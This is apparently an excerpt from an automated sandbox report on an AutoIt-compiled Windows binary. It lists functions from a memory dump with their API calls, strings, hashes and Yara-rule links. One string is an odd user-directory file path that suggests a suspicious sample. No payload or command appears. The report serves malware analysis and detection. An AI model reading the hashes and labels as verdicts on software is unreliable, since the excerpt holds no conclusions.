RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0083E6A1,?,00000000,?,?,?,?,0083E6A1), ref: 0085715E
RegCloseKey.ADVAPI32(?,?,?,?,0083E6A1), ref: 0085718F

Strings

Include, xrefs: 0085710F, 00857158
Software\AutoIt v3\AutoIt, xrefs: 0083E6D3

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 77ceb0c24dd779598cd94d4bd7f4b2216efc1e5c3048e1fbbe31fdd7a97592ef
Instruction ID: 5bf05a54ebe8d3c7868444588206bba42023017692199a8128514f3fe7d5f667
Opcode Fuzzy Hash: 77ceb0c24dd779598cd94d4bd7f4b2216efc1e5c3048e1fbbe31fdd7a97592ef
Instruction Fuzzy Hash: 7121D572780604BBDB20DBA8DC46FEE77BCFF54701F104259B905E7290EA74AA058751

Uniqueness

Uniqueness Score: -1.00%

Function 00840350, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00840385
CreateWindowExW.USER32 ref: 008403AE
ShowWindow.USER32(?,00000000), ref: 008403C4
ShowWindow.USER32(?,00000000), ref: 008403CE

Strings

edit, xrefs: 008403A2
AutoIt v3, xrefs: 00840379, 0084037E

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: dabc475fd722df7b3ba5d33f0bc0ac246225a930bb58b3e66125685cf3134461
Instruction ID: 563c70c133384e89e943fed0615f8c438b78a49dfe153398e07b95924f208463
Opcode Fuzzy Hash: dabc475fd722df7b3ba5d33f0bc0ac246225a930bb58b3e66125685cf3134461
Instruction Fuzzy Hash: 22F0A471BD53107AF6209764AC53F922768F708F11F240406B710BB2E1D5F479408B98

Uniqueness

Uniqueness Score: -1.00%

Function 00887760, Relevance: 9.2, APIs: 6, Instructions: 217COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008877DA
_malloc.LIBCMT ref: 008877F0
_strcat.LIBCMT ref: 0088781B
_wcslen.LIBCMT ref: 00887851
_malloc.LIBCMT ref: 0088786A
_wcscpy.LIBCMT ref: 00887889

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc_wcslen$_strcat_wcscpy
String ID:
API String ID: 1612042205-0
Opcode ID: 1b08c5ededd0c1ef5abc302fd96fd344bda36a44468c7210b218b24a7869ec78
Instruction ID: 3771d76466560d7129295391efe8f3e551109b18da3abfe810a63acdd5ba35b2
Opcode Fuzzy Hash: 1b08c5ededd0c1ef5abc302fd96fd344bda36a44468c7210b218b24a7869ec78
Instruction Fuzzy Hash: E9913DB5600609EFCB10EF68C8D1969BBB5FF49300B60C659EC4ACB316DB34E961CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00862FD3, Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,008D90E8,14000000,0085E1BD), ref: 00862FDD
LockServiceDatabase.ADVAPI32(00000000), ref: 00862FEA
UnlockServiceDatabase.ADVAPI32(00000000), ref: 00862FF5
CloseServiceHandle.ADVAPI32(00000000), ref: 00862FFE
GetLastError.KERNEL32 ref: 00863009
CloseServiceHandle.ADVAPI32(00000000), ref: 00863019

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
String ID:
API String ID: 1690418490-0
Opcode ID: 9e8d486f13b7468aa8ee83577c8eca63ce502845a91237d88ac23a4ba377e651
Instruction ID: 325379bb3b48cda5c25b9759a8823c4ef91f2274b7a65efb01ca8fee3a58f865
Opcode Fuzzy Hash: 9e8d486f13b7468aa8ee83577c8eca63ce502845a91237d88ac23a4ba377e651
Instruction Fuzzy Hash: 94E09231683E20ABD6223B646C4DBCF3B9CFB1A712F050603F201D6161CB59890ADBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008406E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 008406F7
RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0084071E
RegCloseKey.KERNELBASE(?), ref: 00840745
RegCloseKey.ADVAPI32(?), ref: 00840759

Strings

Control Panel\Mouse, xrefs: 008406F5

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$OpenQueryValue
String ID: Control Panel\Mouse
API String ID: 1607946009-824357125
Opcode ID: 0ddd7a94ff6b1b7e2f6efc6edbf6199e55b2777d3271f0cc35db959ad3ddb5c3
Instruction ID: 33e6c5dca07760b42608c8b4f1f978856631232bcc44ad6a6d711624874afbc3
Opcode Fuzzy Hash: 0ddd7a94ff6b1b7e2f6efc6edbf6199e55b2777d3271f0cc35db959ad3ddb5c3
Instruction Fuzzy Hash: 43115E76640508BF9B14DFA9EC459EFB7FCFF68300B10469AF909C3210E6319A16DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0083FEA7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 0083FED3
_memmove.LIBCMT ref: 0083FEE2
__fread_nolock.LIBCMT ref: 0083FF02
_fseek.LIBCMT ref: 0083FF58

Strings

AU3!, xrefs: 0083FECD

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __fread_nolock_fseek_memmove_strcat
String ID: AU3!
API String ID: 1268643489-3499719025
Opcode ID: aa95f14820c0d86fc28365ea41b805d8de6948f68be6e2a4d37bd20c14c4f18d
Instruction ID: db49cf420a2411debb383c9f18429dce0c22edec4b10a5e7579a812105b8b92e
Opcode Fuzzy Hash: aa95f14820c0d86fc28365ea41b805d8de6948f68be6e2a4d37bd20c14c4f18d
Instruction Fuzzy Hash: B211E971D042489BCB11CB688881FED7765FB49300F1845A9FA55DB243DA74A644CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0083F490, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0083FE20: _wcslen.LIBCMT ref: 0083FE35
Part of subcall function 0083FE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,008843ED,?,00000000,?,?), ref: 0083FE4E
Part of subcall function 0083FE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0083FE77

_strcat.LIBCMT ref: 0083F4B6

Part of subcall function 0083F540: _strlen.LIBCMT ref: 0083F548
Part of subcall function 0083F540: _sprintf.LIBCMT ref: 0083F69E

Strings

C:\Users\user\33920049\fmkkelc.omp, xrefs: 0083F49D
?T, xrefs: 0083F522

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
String ID: C:\Users\user\33920049\fmkkelc.omp$?T
API String ID: 3199840319-1843254402
Opcode ID: 22ec96f3d4ed79d17fdaba98b734a83168297d8f7b5b0ef9f9406fc77201243d
Instruction ID: b8d990339154010dbdf973f309ce77b8416544b65c8d88156e2c5eb318a46415
Opcode Fuzzy Hash: 22ec96f3d4ed79d17fdaba98b734a83168297d8f7b5b0ef9f9406fc77201243d
Instruction Fuzzy Hash: 992127B2A042516BC714EF789C82A6EF698FF85300F10893AF655C2283EB34E59487D3

Uniqueness

Uniqueness Score: -1.00%

Function 0084F4A4, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00846433), ref: 0084F4A7
__malloc_crt.LIBCMT ref: 0084F4D6
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0084F4E3

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: ace63158b9ab8d01e9c49b0e2e33cb060fa8f4add10819eac5e4ed0690637d2e
Instruction ID: 8393ec23988220f8c643e56c7696b2cb1151d4ec6a6be6ebd43a4b5255d14989
Opcode Fuzzy Hash: ace63158b9ab8d01e9c49b0e2e33cb060fa8f4add10819eac5e4ed0690637d2e
Instruction Fuzzy Hash: 4DF027379005185ACF317B34BC498A72768FAE532431A843EF602C3203FE288E8186B5

Uniqueness

Uniqueness Score: -1.00%

Function 008414F7, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00841511

Part of subcall function 008434DB: __FF_MSGBANNER.LIBCMT ref: 008434F4
Part of subcall function 008434DB: __NMSG_WRITE.LIBCMT ref: 008434FB
Part of subcall function 008434DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00846A35,?,00000001,?,?,00848179,00000018,008BD180,0000000C,00848209), ref: 00843520

std::exception::exception.LIBCMT ref: 00841546
std::exception::exception.LIBCMT ref: 00841560
__CxxThrowException@8.LIBCMT ref: 00841571

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: 90fe232e5076249c6c4bb1b91c79011131811c0feeb2e721d53d01ee7d53f4dd
Instruction ID: 15c4ebb6825d89bead4d6509ccd0354b29f5b879d1790718dc6fc1b08eca22cf
Opcode Fuzzy Hash: 90fe232e5076249c6c4bb1b91c79011131811c0feeb2e721d53d01ee7d53f4dd
Instruction Fuzzy Hash: 8DF0C83190021DABDF24EFA8DC0ADED7AB9FF90714F100169F415D6291EBB1CE988B52

Uniqueness

Uniqueness Score: -1.00%

Function 00831D10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00831D11

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

_memmove.LIBCMT ref: 00831D57

Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571

Strings

@EXITCODE, xrefs: 00831D10, 00831D53

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
String ID: @EXITCODE
API String ID: 2734553683-3436989551
Opcode ID: 2e4067a483fc2459a1b3f0e0f0c393d559d3f47989546ec9ecea7a1d84fb9087
Instruction ID: 430932fd3d329804a088b19084fc9d480d744824097a87e9f8c5a5e6a4b7c4f6
Opcode Fuzzy Hash: 2e4067a483fc2459a1b3f0e0f0c393d559d3f47989546ec9ecea7a1d84fb9087
Instruction Fuzzy Hash: 08F0CDF2A006459FDB50DF78CC06B2776D4EB85704F04C82CA08AC7B81FA79E4828B21

Uniqueness

Uniqueness Score: -1.00%

Function 008A5031, Relevance: 4.9, APIs: 3, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11a02b09c395deda0b901fac52fca6e030360dd2249ec8b72e0246cd00123d8
Instruction ID: 1b2db25ae0a6222694b3f9a47c24c9d10e7ac136e33506f60fb2310d30f3546e
Opcode Fuzzy Hash: b11a02b09c395deda0b901fac52fca6e030360dd2249ec8b72e0246cd00123d8
Instruction Fuzzy Hash: 88F152B56083019FD710DF28C880A5ABBE4FF89314F148A5DF999CB352E775E985CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00897629, Relevance: 4.8, APIs: 3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsicoll
String ID:
API String ID: 3832890014-0
Opcode ID: c8120c9396932b6eeb0af7e90d939cbe3a8887c2d893eb298a5cbf01d10bde8e
Instruction ID: 9b244d6c6bda87033584686c4559205624b70ed7434bbc78219e9152c581d63e
Opcode Fuzzy Hash: c8120c9396932b6eeb0af7e90d939cbe3a8887c2d893eb298a5cbf01d10bde8e
Instruction Fuzzy Hash: C5A1C27220420A9BDB10EF6DE8859ABB7E4FF85311F14856EFC89D7201D7369825CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0085A943, Relevance: 4.7, APIs: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

VariantInit.OLEAUT32(00000000), ref: 0085A95F
VariantCopy.OLEAUT32(?,?), ref: 0085A969
VariantClear.OLEAUT32(00000000), ref: 0085A97A

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_malloc
String ID:
API String ID: 2981388473-0
Opcode ID: 2b4a2520ff26ca1dfb4efe104741886501b511c49c8fbb1ac68dec20b45bb798
Instruction ID: 8db9b9cb60638523134820333eb610c2f2ecbe9229a9e65a97176ab5baa93368
Opcode Fuzzy Hash: 2b4a2520ff26ca1dfb4efe104741886501b511c49c8fbb1ac68dec20b45bb798
Instruction Fuzzy Hash: 36817D749047548FCB399B18C8C5B1AB7A1FF85311F184A29E889CB721D775EC88CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00859B01, Relevance: 4.7, APIs: 3, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

_memmove.LIBCMT ref: 00839FE6
VariantInit.OLEAUT32(00000000), ref: 00859B15
VariantCopy.OLEAUT32(?,?), ref: 00859B23
VariantClear.OLEAUT32(00000000), ref: 00859B34

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_malloc_memmove
String ID:
API String ID: 441919481-0
Opcode ID: 153f63c44e5ad242e05a8ed3d05a772f8efcbe97806f231bcbc754a1507d6cce
Instruction ID: a00d81ddc31187bf12c543199faae720ae1949e5115e5010becc433a4deadc2f
Opcode Fuzzy Hash: 153f63c44e5ad242e05a8ed3d05a772f8efcbe97806f231bcbc754a1507d6cce
Instruction Fuzzy Hash: 1391D374608351DFD720CF68C580A1AB7F1FB89701F548A6EE995C7350E771E889CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008449DA, Relevance: 4.7, APIs: 3, Instructions: 160COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00844AA6
__read.LIBCMT ref: 00844B09
__filbuf.LIBCMT ref: 00844B25

Part of subcall function 00847E9A: __getptd_noexit.LIBCMT ref: 00847E9A

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 1794320848-0
Opcode ID: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
Instruction ID: ec42e4493f7da605e6f7843659ae6d6259d21af090d868823c364cb30c314319
Opcode Fuzzy Hash: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
Instruction Fuzzy Hash: C251DF31A0071DEBDB24CFA9884479EB7B1FF40328F289669E821E7290E770DE50DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00833868, Relevance: 4.7, APIs: 3, Instructions: 154COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00833853
_wcslen.LIBCMT ref: 008338AD

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: b5ab1d3cd8a3807fb463f1605a2e3270b0b4ca065874706632b6ebcddc31883b
Instruction ID: a7282e36df448a2a8ced3370f852e923d4a2daf4b812dd67be7a7e6564f08cd9
Opcode Fuzzy Hash: b5ab1d3cd8a3807fb463f1605a2e3270b0b4ca065874706632b6ebcddc31883b
Instruction Fuzzy Hash: 2D5194B19083459AEB21EB6888417AB77E4FFD1704F04482EF8C5E7101EB75DA8987D3

Uniqueness

Uniqueness Score: -1.00%

Function 008A52BA, Relevance: 4.6, APIs: 3, Instructions: 141COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 008A5381
TerminateProcess.KERNEL32(00000000), ref: 008A5388

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: 65ea01c3807855d968db4075992c9e4f1a56ec9fa509fbf1cf2c81eeb71e25a7
Instruction ID: d241c2e7ba9638132f6e9385a0405030f5599d49bda81700b75f6155e7d240ea
Opcode Fuzzy Hash: 65ea01c3807855d968db4075992c9e4f1a56ec9fa509fbf1cf2c81eeb71e25a7
Instruction Fuzzy Hash: 715177716083059FDB10EF28D881B6AB7E4FF89314F148A1CF9998B342D775E985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0086297C, Relevance: 4.6, APIs: 3, Instructions: 58COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00862991
MultiByteToWideChar.KERNEL32(00000000,00000001,?,00884515,00000000,00000000,?,?,?,00884515,?,000000FF), ref: 008629A6
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00884515,00000000,00000000,000000FF), ref: 008629E5

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_strlen
String ID:
API String ID: 1433632580-0
Opcode ID: 0749a3f4ca6f5551ee839d96a2dc3e6ebf1e7348948f2307abff6e5ed318b8c7
Instruction ID: 65e6ad07e9081b77969b674efabbc1b08f0867cc57de4a04be7a2587f755d069
Opcode Fuzzy Hash: 0749a3f4ca6f5551ee839d96a2dc3e6ebf1e7348948f2307abff6e5ed318b8c7
Instruction Fuzzy Hash: 1D01F2377401043BEB105A6CAC86FABBB5DEBC4B70F060126FB0CDB2D0E9A1A80042A1

Uniqueness

Uniqueness Score: -1.00%

Function 0083FE20, Relevance: 4.6, APIs: 3, Instructions: 58COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0083FE35
